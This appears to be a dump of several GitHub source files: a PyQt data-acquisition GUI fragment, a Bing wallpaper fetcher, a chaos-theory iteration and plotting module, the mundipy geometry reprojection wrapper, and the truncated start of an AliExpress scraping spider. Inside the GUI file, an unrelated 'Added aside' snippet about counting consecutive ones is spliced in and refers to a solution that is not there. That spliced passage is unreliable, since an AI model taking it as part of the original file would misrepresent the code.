self.config.read(self.config_file)\r\n\r\n # Create a tab for each piece of equipment in the configuration file and initial it at the same time\r\n for section_name in self.config.sections():\r\n self.equipment_config = dict(self.config[section_name])\r\n # if self.equipment_config['function'] == \"daq\":\r\n # self.daq_device = EquipmentHandler(self.equipment_config, self.tab_widget)\r\n # else:\r\n self.equipment_tab = EquipmentHandler(self.equipment_config, self.tab_widget, self.dataPlot)\r\n self.tab_widget.addTab(self.equipment_tab, section_name) #self.equipment_config['name']) \r\n\r\n self.gridLayout.setRowStretch(0, 5)\r\n self.gridLayout.setRowStretch(1, 1)\r\n # self.gridLayout.setRowStretch(2, 1)\r\n # self.gridLayout.setRowStretch(3, 0)\r\n\r\n self.setCentralWidget(self.centralwidget)\r\n\r\n self.menubar = QMenuBar(self)\r\n self.menubar.setGeometry(QtCore.QRect(0, 0, 800, 21))\r\n self.menubar.setObjectName(\"menubar\")\r\n self.menubar.setNativeMenuBar(False)\r\n self.menuFile = QMenu(self.menubar)\r\n 
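# --- Added aside: a single-pass alternative to the two-pointer solution above;
# tracking the length of the current run of 1s gives the same O(n) answer
# without the inner while loop. The asserted input is the problem's Example 1.
def find_max_consecutive_ones(nums):
    best = run = 0
    for n in nums:
        run = run + 1 if n == 1 else 0  # extend or reset the current run
        best = max(best, run)
    return best

assert find_max_consecutive_ones([1, 1, 0, 1, 1, 1]) == 3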
self.menuFile.setObjectName(\"menuFile\")\r\n self.setMenuBar(self.menubar)\r\n self.statusbar = QStatusBar(self)\r\n self.statusbar.setObjectName(\"statusbar\")\r\n self.setStatusBar(self.statusbar)\r\n self.actionSave = QAction(self)\r\n self.actionSave.setObjectName(\"actionSave\")\r\n self.menuFile.addAction(self.actionSave)\r\n self.menubar.addAction(self.menuFile.menuAction())\r\n \r\n # self.retranslateUi(self)\r\n QtCore.QMetaObject.connectSlotsByName(self)\r\n\r\n # def retranslateUi(self, MainWindow):\r\n # _translate = QtCore.QCoreApplication.translate\r\n # MainWindow.setWindowTitle(_translate(\"MainWindow\", \"Data Acquisition System\"))\r\n # self.daqStartButton.setText(_translate(\"MainWindow\", \"Start\"))\r\n # self.daqConnectButton.setText(_translate(\"MainWindow\", \"Connect\"))\r\n # self.menuFile.setTitle(_translate(\"MainWindow\", \"File\"))\r\n # self.actionSave.setText(_translate(\"MainWindow\", \"Save\"))\r\n\r\nif __name__ == \"__main__\":\r\n app = QApplication(sys.argv)\r\n dataAcquisitionSystem = MainWindow(config_file='./equipment_config.ini')\r\n dataAcquisitionSystem.show()\r\n sys.exit(app.exec_())","repo_name":"sshbsshb/daqGui","sub_path":"mainUI.py","file_name":"mainUI.py","file_ext":"py","file_size_in_byte":4018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"9504152334","text":"#!/usr/bin/env python\n# encoding=utf-8\nimport requests\nimport re\nimport os\nimport datetime\npath = os.path.abspath(\".\")\ntemp_time = datetime.datetime.today().day\n\n\ndef get_backgroud_img():\n global temp_time\n now_day = datetime.datetime.today().day\n if temp_time == now_day:\n return\n print(\"抓取\")\n temp_time = now_day\n url = \"http://cn.bing.com\"\n html = requests.get(url).content\n background_image = re.findall('g_img={url: \"(.+?)\"', html)\n if background_image:\n image_url = background_image[0]\n if image_url.startswith(\"//\"):\n image_url = \"http:\" + image_url\n else:\n image_url = url + image_url\n open(path + \"/templates/config_html/backgroudUrl.html\",\n 'w').write(image_url)\n else:\n pass\n\n\nif __name__ == \"__main__\":\n get_backgroud_img()\n","repo_name":"2008820/flask_blog","sub_path":"app/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38821195437","text":"\"\"\"iterate functions\r\n By: Nathan Flack\r\n Version: 1.3\r\n\"\"\"\r\nfrom __future__ import division\r\n\r\nimport decimal\r\nimport pprint as pp\r\nimport traceback\r\nfrom decimal import Decimal as D\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom sympy import UnevaluatedExpr as uv\r\nfrom sympy import *\r\n\r\nSEED = 100\r\n\r\nx, y, z, t = symbols('x y z t')\r\nk, m, n = symbols('k m n', integer=True)\r\nf, g, h = symbols('f g h', cls=Function)\r\n\r\n\r\ndef find_fixed_points(expression):\r\n try:\r\n fixed_points = solve(Eq(expression, x), x)\r\n except NotImplementedError as exc:\r\n # print(traceback.format_exc())\r\n print(exc)\r\n return []\r\n return fixed_points\r\n\r\ndef printProgressBar (iteration, total, prefix = '', suffix = '', decimals = 1, length = 100, fill = '█', printEnd = \"\\r\"):\r\n \"\"\"\r\n from stack overflow\r\n Call in a loop to create terminal progress bar\r\n @params:\r\n iteration - Required : current iteration (Int)\r\n total - Required : total iterations (Int)\r\n prefix - Optional : prefix string (Str)\r\n suffix - Optional : 
suffix string (Str)\r\n decimals - Optional : positive number of decimals in percent complete (Int)\r\n length - Optional : character length of bar (Int)\r\n fill - Optional : bar fill character (Str)\r\n printEnd - Optional : end character (e.g. \"\\r\", \"\\r\\n\") (Str)\r\n \"\"\"\r\n percent = (\"{0:.\" + str(decimals) + \"f}\").format(100 * (iteration / float(total)))\r\n filledLength = int(length * iteration // total)\r\n bar = fill * filledLength + '-' * (length - filledLength)\r\n print(f'\\r{prefix} |{bar}| {percent}% {suffix}', end = printEnd)\r\n # Print New Line on Complete\r\n if iteration == total: \r\n print()\r\n\r\n\r\ndef iterate_expression(expression, value, precision, max_iterations=100000):\r\n \"\"\"iterates over a function with the initial value and returns \r\n the list of iterated values\r\n\r\n Args:\r\n expression (SymPy object)): function of x to be iterated\r\n value (float): initial value\r\n precision (int): decimal precision\r\n max_iterations (int): amount of iterations\r\n\r\n Returns:\r\n list: list of iterated values\r\n \"\"\"\r\n iterating_value = expression.subs(x, value)\r\n last_iterating_value = iterating_value + 1\r\n iterate_list = [value, iterating_value]\r\n count = 0\r\n\r\n while abs(last_iterating_value - iterating_value) > 10**(-1*precision) and count < max_iterations:\r\n last_iterating_value = iterating_value\r\n iterating_value = round(expression.subs(x, iterating_value), 14)\r\n if iterating_value < 1e200 and iterating_value > -1e200:\r\n iterate_list.append(iterating_value)\r\n else:\r\n break\r\n count += 1\r\n return iterate_list\r\n\r\n\r\ndef lab_iterate_expression(expression, value, precision):\r\n \"\"\"iterates over a function with the initial value and returns \r\n the list of iterated values\r\n\r\n Args:\r\n expression (SymPy object)): function of x to be iterated\r\n value (float): initial value\r\n precision (int): amount of iterations\r\n\r\n Returns:\r\n list: list of iterated values\r\n \"\"\"\r\n fixed_points = find_fixed_points(expression)\r\n result = expression.subs(x, value)\r\n iterate_list = [value, result]\r\n\r\n iterating_value = value\r\n last_iterating_value = iterating_value + 1\r\n count = 0\r\n\r\n while abs(last_iterating_value - iterating_value) > 10**(-1*precision) and iterating_value not in fixed_points and count < 100000:\r\n last_iterating_value = iterating_value\r\n iterating_value = expression.subs(x, iterating_value)\r\n if int(iterating_value) < 1e200 and int(iterating_value) > -1e200:\r\n iterate_list.append(iterating_value)\r\n else:\r\n break\r\n count += 1\r\n return iterate_list\r\n\r\n\r\ndef calculate_square(value, seed, precision):\r\n try:\r\n if value == 0:\r\n raise ZeroDivisionError\r\n success = True\r\n w = seed\r\n graph1 = []\r\n graph1.append(w)\r\n last_w = w + 1\r\n count = 0\r\n\r\n while round(last_w - w, precision + 1) != 0 and count < 100:\r\n if w == 0:\r\n raise ZeroDivisionError\r\n if count > 98:\r\n success = False\r\n last_w = w\r\n w = w - (w**2 - value)/(2*w)\r\n graph1.append(w)\r\n count += 1\r\n return success, graph1\r\n except ZeroDivisionError as err:\r\n print('F\\'(x) is 0:', err)\r\n\r\n\r\ndef iterate_over_range(expression, max):\r\n iterate_dict = {}\r\n for item in np.arange(-1*max - 1, max + 1, .0001):\r\n iterate_list = iterate_expression(\r\n expression, item, 20)\r\n iterate_dict[item] = iterate_list[-1]\r\n return iterate_dict\r\n\r\n\r\ndef plot_graph_helper(graph_list, title, xlabel, ylabel, window_name, is_logarithm=False, has_grid = False, 
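# --- Added aside: what calculate_square() above converges to. Each step
# applies the Newton update w <- w - (w**2 - a) / (2*w), whose fixed point is
# sqrt(a); starting from the module's SEED of 100:
a, w = 2.0, 100.0
for _ in range(12):
    w = w - (w**2 - a) / (2 * w)
print(w)  # ~1.41421356..., i.e. sqrt(2)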
success=True):\r\n \"\"\"takes a list and plots it out. takes arguments that are used in displaying the graph\r\n\r\n Args:\r\n graph_list (list): list of numbers used as the y values in the graph\r\n title (string): [description]\r\n xlabel (string): [description]\r\n ylabel (string): [description]\r\n window_name (string): [description]\r\n is_logarithm (bool, optional): whether to use the log scale on the y graph. Defaults to False.\r\n has_grid (bool, optional): displays red grid lines. Defaults to False.\r\n success (bool, optional): [description]. Defaults to True.\r\n \"\"\"\r\n font1 = {'family': 'serif', 'color': 'blue', 'size': 20}\r\n font2 = {'family': 'serif', 'color': 'darkred', 'size': 15}\r\n fig, ax = plt.subplots(num=window_name)\r\n \r\n if is_logarithm:\r\n ax.semilogy(range(0, len(graph_list)), graph_list)\r\n else:\r\n ax.plot(range(0, len(graph_list)), graph_list)\r\n \r\n plt.title(title, fontdict=font1)\r\n plt.xlabel(xlabel, fontdict=font2)\r\n plt.ylabel(ylabel, fontdict=font2)\r\n if has_grid:\r\n ax.grid(color='r', linestyle='-', linewidth=.5)\r\n\r\n if success:\r\n ax.text(.3, .7,\r\n f' Last Value: {float(graph_list[-1])}\\nSecond to Last: {float(graph_list[-2])}', transform=ax.transAxes)\r\n else:\r\n ax.text(int(len(graph_list)/2), 0.7*SEED, 'unable to calculate')\r\n\r\n\r\ndef plot_iterate_graph(precision, expression, value, is_logarithm=False, max_iterations=100000, has_grid=False):\r\n \"\"\"puts arguments into iterate() function then plots the resulting graph\r\n\r\n Args:\r\n precision (int): [description]\r\n expression (SymPy object): function of x to be iterated\r\n value (float): initial value\r\n range_amount (int): times that the function should be iterated\r\n logarithm (bool, optional): whether the y axis should be logarithmic. 
Defaults to False.\r\n\r\n Returns:\r\n list: graphed list\r\n \"\"\"\r\n graph_list = iterate_expression(\r\n expression, value, precision, max_iterations)\r\n\r\n plot_graph_helper(graph_list,\r\n f'F(x) = {expression}, x0 = {value}', \"Iterations\", \"Value\", f'Iteration of F(x) = {expression}, x0 = {value}', is_logarithm, has_grid)\r\n return graph_list\r\n\r\n\r\ndef plot_square_graph(precision, value):\r\n success, graph_list = calculate_square(value, SEED, precision)\r\n plot_graph_helper(graph_list,\r\n \"Newton's Method\", \"Iterations\", \"Value\", 'Square of ' + str(value) +\r\n ' with precision of ' + str(precision))\r\n return graph_list\r\n\r\n\r\ndef find_basin_of_attraction(expression, seed, precision):\r\n \"\"\"finds the basin of attraction\r\n\r\n Args:\r\n expression (SymPy object): function of x\r\n seed (float): seed value\r\n precision (int): decimal precision\r\n\r\n Returns:\r\n boolean: success\r\n list: list of iterated values\r\n \"\"\"\r\n try:\r\n fixed_points = find_fixed_points(expression)\r\n derivative = diff(expression, x)\r\n if seed == 0:\r\n raise ZeroDivisionError\r\n success = True\r\n w = seed\r\n graph1 = []\r\n graph1.append(w)\r\n last_w = w + 1\r\n count = 0\r\n\r\n while round(last_w - w, precision + 1) != 0 and count < 100:\r\n if derivative.subs(x, w) == 0:\r\n raise ZeroDivisionError\r\n if count > 98:\r\n success = False\r\n last_w = w\r\n w = w - (expression.subs(x, w))/(derivative.subs(x, w))\r\n graph1.append(w)\r\n count += 1\r\n return success, graph1\r\n except ZeroDivisionError as err:\r\n print('F\\'(x) is 0:', err)\r\n return False, []\r\n\r\n\r\ndef plot_basin_graph(precision, expression, value, logarithm=False):\r\n \"\"\"puts arguments into find_basin_of_attraction() function then plots the resulting graph\r\n\r\n Args:\r\n precision (int): decimal precision\r\n expression (SymPy object): function of x\r\n value (float): seed value\r\n logarithm (bool, optional): whether the y axis should be logarithmic. 
Defaults to False.\r\n\r\n Returns:\r\n boolean: success\r\n list: graphed list\r\n \"\"\"\r\n success, graph_list = find_basin_of_attraction(\r\n expression, value, precision)\r\n\r\n plot_graph_helper(graph_list,\r\n f'F(x) = {expression}, x0 = {value}', \"Iterations\", \"Value\", f'Basin of attraction of F(x) = {expression}, seed = {value}', success, logarithm)\r\n return graph_list\r\n\r\n\r\ndef graph_cobweb(expression, initial_value, max_iterations, low_range, high_range):\r\n font1 = {'family': 'serif', 'color': 'blue', 'size': 20}\r\n font2 = {'family': 'serif', 'color': 'darkred', 'size': 15}\r\n graph_list = iterate_expression(\r\n expression, initial_value, 8, max_iterations)\r\n t = np.linspace(low_range, high_range, 100)\r\n values = list(map(lambda j: expression.subs(x, j), t))\r\n fig, ax = plt.subplots(num=f'Cobweb plot of F(x) = {expression}, x0 = {initial_value}')\r\n plt.title(f'F(x) = {expression}, x0 = {initial_value}', fontdict=font2)\r\n plt.xlabel('x', fontdict=font2)\r\n plt.ylabel('y', fontdict=font2)\r\n ax.plot(t, values)\r\n ax.plot(t, t)\r\n ax.plot([initial_value, initial_value], [\r\n initial_value, graph_list[1]], color='r')\r\n ax.plot([initial_value, graph_list[1]], [\r\n graph_list[1], graph_list[1]], color='r')\r\n for loop_controller in range(1, len(graph_list) - 1):\r\n ax.plot([graph_list[loop_controller], graph_list[loop_controller]], [\r\n graph_list[loop_controller], graph_list[loop_controller + 1]], color='r')\r\n ax.plot([graph_list[loop_controller], graph_list[loop_controller + 1]],\r\n [graph_list[loop_controller + 1], graph_list[loop_controller + 1]], color='r')\r\n\r\n\r\ndef main():\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"nathan416/nathan-spring-2022-homework","sub_path":"CPSC455-Chaos/transition_to_chaos/iterate.py","file_name":"iterate.py","file_ext":"py","file_size_in_byte":10834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38604712308","text":"import json\nfrom functools import lru_cache, cached_property\nfrom collections.abc import Sequence\n\nimport shapely.geometry as geom\nfrom shapely.geometry import shape, box\nfrom shapely import transform, GEOSException, make_valid\nimport numpy as np\n\nfrom mundipy.cache import pyproj_transform\nfrom mundipy.pcs import choose_pcs\n\n# Set bit = yes\n# Must we transform any coordinates at all to do this operation?\nTRANSFORM_INPUT = 1 << 0\n# Does this operation return a shapely base geometry?\n# this implies we transform the result back\nRETURN_GEO = 1 << 1\n\nSHAPELY_METHODS = {\n\t'__and__': 0,\n\t'__array_interface__': 0,\n\t'__bool__': 0,\n\t'__class__': 0,\n\t'__del__': 0,\n\t'__delattr__': 0,\n\t'__dict__': 0,\n\t'__dir__': 0,\n\t'__doc__': 0,\n\t'__eq__': 0,\n\t'__format__': 0,\n\t'__ge__': 0,\n\t'__geo_interface__': 0,\n\t'__geom__': 0,\n\t'__getattribute__': 0,\n\t'__getstate__': 0,\n\t'__gt__': 0,\n\t'__hash__': 0,\n\t'__init__': 0,\n\t'__init_subclass__': 0,\n\t'__le__': 0,\n\t'__lt__': 0,\n\t'__module__': 0,\n\t'__ne__': 0,\n\t'__new__': 0,\n\t'__nonzero__': 0,\n\t'__or__': 0,\n\t'__p__': 0,\n\t'__reduce__': 0,\n\t'__reduce_ex__': 0,\n\t'__repr__': 0,\n\t'__setattr__': 0,\n\t'__setstate__': 0,\n\t'__sizeof__': 0,\n\t'__str__': 0,\n\t'__sub__': 0,\n\t'__subclasshook__': 0,\n\t'__weakref__': 0,\n\t'__xor__': 0,\n\t'_array_interface_base': 0,\n\t'_crs': 0,\n\t'_ctypes': 0,\n\t'_ctypes_data': 0,\n\t'_empty': 0,\n\t'_geom': 0,\n\t'_get_coords': 0,\n\t'_is_empty': 0,\n\t'_lgeos': 
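# --- Added aside: reading the bit-flag table above. Each SHAPELY_METHODS entry
# ORs the two flags together and callers test membership with `&`; a standalone
# illustration of the same pattern:
TRANSFORM_INPUT = 1 << 0
RETURN_GEO = 1 << 1
flags = TRANSFORM_INPUT | RETURN_GEO  # e.g. the 'buffer' entry
assert flags & TRANSFORM_INPUT        # inputs must be reprojected first
assert flags & RETURN_GEO             # and the geometry result projected back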
0,\n\t'_ndim': 0,\n\t'_other_owned': 0,\n\t'_repr_svg_': 0,\n\t'_set_coords': 0,\n\t'_set_geom': 0,\n\t# Should be spatially invariant\n\t'almost_equals': 0,\n\t# Depends on the transformation but returns a float\n\t'area': TRANSFORM_INPUT,\n\t'array_interface_base': 0,\n\t# Don't think this needs to be projected\n\t'boundary': 0,\n\t'bounds': 0,\n\t# Does need projection because of units and distortion\n\t'buffer': TRANSFORM_INPUT | RETURN_GEO,\n\t# Centroid changes depending on location on the earth\n\t'centroid': TRANSFORM_INPUT | RETURN_GEO,\n\t# needs everything probably\n\t'convex_hull': TRANSFORM_INPUT | RETURN_GEO,\n\t# just give straight coordinates\n\t'coords': 0,\n\t# boolean ops\n\t# straight line on earth != projected straight line\n\t'contains': TRANSFORM_INPUT,\n\t'covered_by': TRANSFORM_INPUT,\n\t'covers': TRANSFORM_INPUT,\n\t'crosses': TRANSFORM_INPUT,\n\t'disjoint': TRANSFORM_INPUT,\n\t'intersects': TRANSFORM_INPUT,\n\t'overlaps': TRANSFORM_INPUT,\n\t'touches': TRANSFORM_INPUT,\n\t# idk\n\t'ctypes': 0,\n\t# needs all\n\t'difference': TRANSFORM_INPUT | RETURN_GEO,\n\t# needs projection returns float\n\t'distance': TRANSFORM_INPUT,\n\t# bool property\n\t'empty': 0,\n\t# needs all\n\t'envelope': TRANSFORM_INPUT | RETURN_GEO,\n\t# none needed because pointwise\n\t'equals': 0,\n\t'equals_exact': 0,\n\t'geom_type': 0,\n\t'geometryType': 0,\n\t'has_z': 0,\n\t# much like .distance()\n\t'hausdorff_distance': TRANSFORM_INPUT,\n\t# idk\n\t'impl': 0,\n\t# adds more points within a line, definitely needs this\n\t'interpolate': TRANSFORM_INPUT | RETURN_GEO,\n\t# needs all\n\t'intersection': TRANSFORM_INPUT | RETURN_GEO,\n\t# bool unnecessary\n\t'is_closed': 0,\n\t'is_empty': 0,\n\t'is_ring': 0,\n\t'is_simple': 0,\n\t'is_valid': 0,\n\t# projection to units\n\t'length': TRANSFORM_INPUT,\n\t# needs units\n\t'minimum_clearance': TRANSFORM_INPUT,\n\t# gives a polygon\n\t'minimum_rotated_rectangle': TRANSFORM_INPUT | RETURN_GEO,\n\t# internal method that re-orders points\n\t'normalize': 0,\n\t# distance calculation\n\t'project': TRANSFORM_INPUT,\n\t# complex; this might be wrong\n\t'relate': TRANSFORM_INPUT,\n\t'relate_pattern': TRANSFORM_INPUT,\n\t# does not matter as long as it's inside\n\t'representative_point': 0,\n\t# tolerance should be in units\n\t'simplify': TRANSFORM_INPUT | RETURN_GEO,\n\t# ??\n\t'svg': 0,\n\t# needs all\n\t'symmetric_difference': TRANSFORM_INPUT | RETURN_GEO,\n\t# don't think this is geometric\n\t'type': 0,\n\t# needs all\n\t'union': TRANSFORM_INPUT | RETURN_GEO,\n\t# same as .contains\n\t'within': TRANSFORM_INPUT | RETURN_GEO,\n\t'wkb': 0,\n\t'wkb_hex': 0,\n\t'wkt': 0,\n\t# no transform needed\n\t'xy': 0\n}\n\n# dir() is expensive, so cache by type\n@lru_cache(maxsize=8)\ndef parent_methods(parent_class):\n\treturn [f for f in dir(parent_class)]\n\nclass BaseGeometry():\n\n\tparent_class = None\n\n\tdef __init__(self, geo, crs: str, features: dict):\n\t\tself.features = features\n\t\tself.crs = crs\n\t\t# either a function generating a shapely.geometry, or a value\n\t\t# if the value is a sequence, pass it to the constructor\n\t\tif isinstance(geo, Sequence):\n\t\t\tself._geo_val = self.parent_class(geo)\n\t\telse:\n\t\t\tself._geo_val = geo\n\n\t@property\n\tdef _geo(self):\n\t\tif callable(self._geo_val):\n\t\t\tself._geo_val = self._geo_val()\n\n\t\treturn self._geo_val\n\n\t@lru_cache(maxsize=4)\n\tdef as_shapely(self, to_crs):\n\t\t\"\"\" Take the geometry as a shapely object in a coordinate system. 
\"\"\"\n\t\tif to_crs == self.crs:\n\t\t\treturn self._geo\n\n\t\ttransformer = pyproj_transform(self.crs, to_crs)\n\t\tdef np_transform(pts):\n\t\t\tfx, fy = transformer(pts[:, 0], pts[:, 1])\n\t\t\treturn np.dstack([fx, fy])[0]\n\n\t\treturn transform(self._geo, np_transform)\n\n\tdef __getitem__(self, item):\n\t\treturn self.features[item]\n\n\tdef __setitem__(self, item, value):\n\t\tself.features[item] = value\n\n\t@cached_property\n\tdef fast_bounds(self):\n\t\t# because PCS (traditionally) use northing and easting\n\t\t# as positive and this matches with EPSG:4326 generally,\n\t\t# let's use this to calculate fast bounds for PCS finding\n\n\t\t# avoid transformer altogether\n\t\tif self.crs == 'EPSG:4326':\n\t\t\treturn self._geo.bounds\n\n\t\t# this creates an *approximate* bounds of the polygon,\n\t\t# but does it very fast - for use only in the projection\n\t\t# selection algorithm\n\t\ttransformer = pyproj_transform(self.crs, 'EPSG:4326')\n\n\t\tminx, miny, maxx, maxy = self._geo.bounds\n\n\t\tminx, miny = transformer(minx, miny)\n\t\tmaxx, maxy = transformer(maxx, maxy)\n\n\t\treturn (minx, miny, maxx, maxy)\n\n\t@property\n\tdef __geo_interface__(self):\n\t\t\"\"\"Get a GeoJSON representation in EPSG:4326\"\"\"\n\t\treturn {\n\t\t\t'type': 'Feature',\n\t\t\t'geometry': self.as_shapely('EPSG:4326').__geo_interface__,\n\t\t\t'properties': self.features\n\t\t}\n\n\tdef __getattr__(self, name):\n\t\tif name not in parent_methods(self.parent_class):\n\t\t\traise AttributeError('\"%s\" has no attribute \"%s\"' % (str(type(self)), name))\n\n\t\ttarget = getattr(self.parent_class, name)\n\n\t\t# bind to self if callable\n\t\tif isinstance(target, property):\n\t\t\t# some properties are calculated in a local projection\n\t\t\tattr_flags = SHAPELY_METHODS[name] if name in SHAPELY_METHODS else 0\n\n\t\t\t# default to WGS84\n\t\t\tprojection = 'EPSG:4326'\n\t\t\tif attr_flags & TRANSFORM_INPUT:\n\t\t\t\t# wrap in appropriate PCS\n\t\t\t\tprojection = choose_pcs(box(*self.fast_bounds), units='meters')['crs']\n\n\t\t\t# perform op in chosen coordinate system\n\t\t\tret = target.fget(self.as_shapely(projection))\n\n\t\t\tif not attr_flags & RETURN_GEO:\n\t\t\t\treturn ret\n\n\t\t\t# transform geometry out\n\t\t\treturn enrich_geom(ret, self.features, pcs=projection)\n\n\t\telif callable(target):\n\t\t\t# get attribute flags\n\t\t\tattr_flags = SHAPELY_METHODS[name]\n\n\t\t\tdef projection_wrapper(*args, **kwargs):\n\t\t\t\t# wrapper function for any method that could require\n\t\t\t\t# projecting to a cartesian coordinate plane\n\t\t\t\tcustom_args = [self, *args]\n\n\t\t\t\t# many methods require that we transform the self and other\n\t\t\t\t# arguments to a local projection before executing the op\n\t\t\t\tif attr_flags & TRANSFORM_INPUT:\n\t\t\t\t\t# wrap in appropriate PCS\n\t\t\t\t\t# get total bounds (minx, miny, maxx, maxy)\n\t\t\t\t\ttotal_bounds = [ obj.fast_bounds for obj in args if isinstance(obj, BaseGeometry) ] + [ self.fast_bounds ]\n\t\t\t\t\ttotal_bounds = ( min(map(lambda b: b[0], total_bounds)), min(map(lambda b: b[1], total_bounds)),\n\t\t\t\t\t\t\t\t\t max(map(lambda b: b[2], total_bounds)), max(map(lambda b: b[3], total_bounds)) )\n\n\t\t\t\t\tprojection = choose_pcs(box(*total_bounds), units='meters')['crs']\n\n\t\t\t\t\t# convert to projections and raw shapely objects\n\t\t\t\t\t# pass through if floats, other types, etc\n\t\t\t\t\t# beware of double projecting, which is why we do shapely first, then mundipy geometries\n\t\t\t\t\ttransformer = 
pyproj_transform('EPSG:4326', projection)\n\t\t\t\t\t# shapely's transform() takes (geometry, transformation) and hands the\n\t\t\t\t\t# transformation an (N, 2) coordinate array, so wrap the pyproj\n\t\t\t\t\t# transformer the same way as_shapely() does above\n\t\t\t\t\tdef np_transform(pts):\n\t\t\t\t\t\tfx, fy = transformer(pts[:, 0], pts[:, 1])\n\t\t\t\t\t\treturn np.dstack([fx, fy])[0]\n\t\t\t\t\tcustom_args = [ transform(x, np_transform) if isinstance(x, geom.base.BaseGeometry) else x for x in custom_args ]\n\n\t\t\t\t\tcustom_args = [ x.as_shapely(projection) if isinstance(x, BaseGeometry) else x for x in custom_args ]\n\n\t\t\t\t# if we don't return a geometric object, we immediately\n\t\t\t\t# execute and return\n\t\t\t\tif not attr_flags & RETURN_GEO:\n\t\t\t\t\t# performing operations on invalid geometries can\n\t\t\t\t\t# throw GEOSException, but .make_valid is expensive.\n\t\t\t\t\t# We lazily repair invalid geometries upon error\n\t\t\t\t\ttry:\n\t\t\t\t\t\treturn target(*custom_args, **kwargs)\n\t\t\t\t\texcept GEOSException:\n\t\t\t\t\t\t# make_valid repairs invalid geometries\n\t\t\t\t\t\trepaired_args = [ make_valid(x) if isinstance(x, geom.base.BaseGeometry) else x for x in custom_args ]\n\n\t\t\t\t\t\treturn target(*repaired_args, **kwargs)\n\n\t\t\t\ttry:\n\t\t\t\t\t# If we do return a geometry, there's a chance we need to\n\t\t\t\t\t# reproject into the geographic coordinate system, but also\n\t\t\t\t\t# a chance that we want to keep in the local projection.\n\t\t\t\t\t# Because of this, we create the geometry from local, and\n\t\t\t\t\t# will lazily transform to geographic if needed.\n\t\t\t\t\tret = target(*custom_args, **kwargs)\n\t\t\t\t\treturn enrich_geom(ret, self.features, pcs=projection)\n\t\t\t\texcept GEOSException:\n\t\t\t\t\trepaired_args = [ make_valid(x) if isinstance(x, geom.base.BaseGeometry) else x for x in custom_args ]\n\n\t\t\t\t\tret = target(*repaired_args, **kwargs)\n\t\t\t\t\treturn enrich_geom(ret, self.features, pcs=projection)\n\n\t\t\treturn projection_wrapper\n\t\telse:\n\t\t\treturn target\n\nclass Point(BaseGeometry):\n\n\tparent_class = geom.Point\n\n\tdef __init__(self, geo: geom.Point, crs: str, features: dict):\n\t\tsuper().__init__(geo, crs, features)\n\nclass MultiPoint(BaseGeometry):\n\n\tparent_class = geom.MultiPoint\n\n\tdef __init__(self, geo: geom.MultiPoint, crs: str, features: dict):\n\t\tsuper().__init__(geo, crs, features)\n\nclass LineString(BaseGeometry):\n\n\tparent_class = geom.LineString\n\n\tdef __init__(self, geo: geom.LineString, crs: str, features: dict):\n\t\tsuper().__init__(geo, crs, features)\n\nclass MultiLineString(BaseGeometry):\n\n\tparent_class = geom.MultiLineString\n\n\tdef __init__(self, geo: geom.MultiLineString, crs: str, features: dict):\n\t\tsuper().__init__(geo, crs, features)\n\nclass Polygon(BaseGeometry):\n\n\tparent_class = geom.Polygon\n\n\tdef __init__(self, geo: geom.Polygon, crs: str, features: dict):\n\t\tsuper().__init__(geo, crs, features)\n\nclass MultiPolygon(BaseGeometry):\n\n\tparent_class = geom.MultiPolygon\n\n\tdef __init__(self, geo: geom.MultiPolygon, crs: str, features: dict):\n\t\tsuper().__init__(geo, crs, features)\n\nclass GeometryCollection(BaseGeometry):\n\n\tparent_class = geom.GeometryCollection\n\n\tdef __init__(self, geo: geom.GeometryCollection, crs: str, features: dict):\n\t\tsuper().__init__(geo, crs, features)\n\ndef enrich_geom(geo, features, pcs='EPSG:4326'):\n\t\"\"\"Enrich a shapely geometry with old features\"\"\"\n\tif isinstance(geo, geom.Point):\n\t\treturn Point(geo, pcs, features)\n\telif isinstance(geo, geom.MultiPoint):\n\t\treturn MultiPoint(geo, pcs, features)\n\telif isinstance(geo, geom.LineString):\n\t\treturn LineString(geo, pcs, features)\n\telif isinstance(geo, geom.MultiLineString):\n\t\treturn MultiLineString(geo, pcs, features)\n\telif isinstance(geo, geom.Polygon):\n\t\treturn 
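Once wrapped, a geometry exposes the shapely API with reprojection handled behind the scenes by the dispatch above. A hedged usage sketch; it assumes mundipy's choose_pcs can resolve a metric PCS for these coordinates:

import shapely.geometry as geom

pt = Point(geom.Point(-122.4, 37.8), 'EPSG:4326', {'name': 'SF'})
buffered = pt.buffer(100)      # TRANSFORM_INPUT | RETURN_GEO: metres, not degrees
print(buffered['name'])        # features ride along through enrich_geom
print(pt.distance(buffered))   # TRANSFORM_INPUT only: plain float, 0.0 here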
Polygon(geo, pcs, features)\n\telif isinstance(geo, geom.MultiPolygon):\n\t\treturn MultiPolygon(geo, pcs, features)\n\telif isinstance(geo, geom.GeometryCollection):\n\t\treturn GeometryCollection(geo, pcs, features)\n\telse:\n\t\traise TypeError('enrich_geom got unsupported type %s' % str(type(geo)))\n\ndef loads(obj):\n\tif 'type' not in obj or obj['type'] != 'FeatureCollection':\n\t\traise ValueError('mundipy.geometry.loads expects type=FeatureCollection')\n\n\tif 'features' not in obj or not isinstance(obj['features'], list):\n\t\traise ValueError('mundipy.geometry.loads expects features to be a list')\n\n\treturn [ enrich_geom(shape(f['geometry']), f['properties']) for i, f in enumerate(obj['features']) ]\n\ndef dumps(features):\n\tif not isinstance(features, list):\n\t\traise TypeError('mundipy.geometry.dumps expects list of features')\n\n\treturn {\n\t\t'type': 'FeatureCollection',\n\t\t'features': [ f.__geo_interface__ for f in features ]\n\t}\n","repo_name":"BuntingLabs/mundipy","sub_path":"mundipy/geometry.py","file_name":"geometry.py","file_ext":"py","file_size_in_byte":12028,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"19"} +{"seq_id":"7042926168","text":"# -*- coding: utf-8 -*-\nimport json\nimport logging\nimport urlparse\nfrom datetime import datetime\n\nimport scrapy\nfrom pybloom import ScalableBloomFilter\nfrom pymongo import MongoClient\nfrom scrapy.exceptions import CloseSpider\nfrom scrapy_redis.spiders import RedisSpider\n\nfrom items import OrderItem\n\n\nclass OrderSpider(RedisSpider):\n name = \"order\"\n allowed_domains = [\"aliexpress.com\"]\n start_urls = (\n 